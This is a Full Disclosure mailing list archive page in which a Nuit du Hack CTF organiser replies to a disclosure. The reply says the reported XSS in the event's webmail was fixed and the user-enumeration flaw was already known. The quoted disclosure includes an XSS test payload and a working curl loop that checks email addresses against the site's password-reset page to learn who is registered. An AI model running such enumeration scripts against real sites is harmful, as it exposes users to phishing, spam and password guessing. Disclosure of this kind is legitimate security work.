Full Disclosure mailing list archives
Re: Oracle based personal data dumping attack on the nuit du hack CTF
From: Damien Cauquil <d.cauquil () sysdream com>
Date: Mon, 26 Mar 2012 13:37:52 +0200
Hi klondike,
PS: What I wonder now is, are the guys behind the CTF reading
Full-disclosure? I guess you now have your answer.
The guys have a cool XSS injection on the fake webmail service which
can be exploited with a properly crafted subject You're right, and it has been fixed during the prequals. Anyway, this vulnerability is minor because teams couldn't send emails to each others. At least, you can pwn your own web browser. For the last vuln mentionned, we were aware of it. Guys who wrote the code were seriously slapped. Damien, NDH prequals team -- Damien Cauquil Directeur de Recherche CEH, CHFI, ECSA, CEI Tél. : +33 (0)1 78 76 58 21 Fax.: +33 (0)1 40 12 74 41 Sysdream IT Security Services 108, av. Gabriel Péri 93400 Saint Ouen http://www.sysdream.com/ Le samedi 24 mars 2012 à 05:54 +0100, klondike a écrit :
El 24/03/12 05:27, klondike escribió:So I was bored with the nuit du hack prequals and decided to test a bit the e-mail service. The guys have a cool XSS injection on the fake webmail service which can be exploited with a properly crafted subject (i.e. <script>alert('Hello!');</script> ). I thought the guys behind nuit du hack were a bit more serious than this... klondikeBTW and on completely unrelated note there is an attack which could allow an attacker to guess the addresses of the participants as long as they are on a database owned by him. This attack works by consulting the page as if it were a yes/no oracle and using the results to know wether an address is on the page database or not. Usages of the attack? Well, trying to guess participants passwords, phising attacks, spamming ... Pick your choice xD And as with any good full disclosure here you go a nice script to exploit it: while read email; do curl -s -o- http://prequals.nuitduhack.com/rememberme.php -d "mail=$email" | fgrep '<div class="error">This mail doesn'\''t correspond to any account</div>' > /dev/null && echo Failure || echo "$email"; done Well don't be bad with it, participants have no fault of this, klondike PS: What I wonder now is, are the guys behind the CTF reading Full-disclosure? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Permanent XSS on the nuit du hack webmail service klondike (Mar 23)
- Re: Oracle based personal data dumping attack on the nuit du hack CTF klondike (Mar 23)
- Re: Oracle based personal data dumping attack on the nuit du hack CTF Damien Cauquil (Mar 26)
- Re: Oracle based personal data dumping attack on the nuit du hack CTF majinboo (Mar 26)
- Re: Oracle based personal data dumping attack on the nuit du hack CTF klondike (Mar 27)
- Re: Oracle based personal data dumping attack on the nuit du hack CTF Damien Cauquil (Mar 26)
- Re: Oracle based personal data dumping attack on the nuit du hack CTF klondike (Mar 23)